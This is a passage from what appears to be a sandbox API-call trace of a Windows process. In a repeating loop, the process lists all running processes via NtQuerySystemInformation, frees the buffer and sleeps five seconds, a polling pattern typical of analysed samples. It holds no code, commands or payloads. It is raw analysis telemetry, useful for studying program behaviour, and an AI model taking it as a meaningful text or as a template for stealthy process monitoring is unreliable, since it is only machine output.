BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.485] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.502] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.515] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.531] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.548] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.566] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.578] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.593] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.610] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.624] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.640] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.656] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.672] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.689] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.705] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.719] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.734] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.751] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.765] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.781] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.797] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 